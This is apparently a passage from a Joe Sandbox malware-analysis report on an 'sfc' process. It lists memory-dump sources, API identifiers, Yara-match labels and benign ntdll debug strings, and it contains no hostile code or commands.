                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02A91350,02AA6757,02AA4037,?), ref: 02A97553
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      Strings
                                                                                                                      • Execute=1, xrefs: 03214713
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03214742
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03214725
                                                                                                                      • ExecuteOptions, xrefs: 032146A0
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03214655
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03214787
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032146FC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      Strings
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032102E7
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032102BD
                                                                                                                      • RTL: Re-Waiting, xrefs: 0321031E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03217B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 03217B8E
                                                                                                                      • RTL: Re-Waiting, xrefs: 03217BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0321728C
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 032172A3
                                                                                                                      • RTL: Re-Waiting, xrefs: 032172C1
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03217294
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280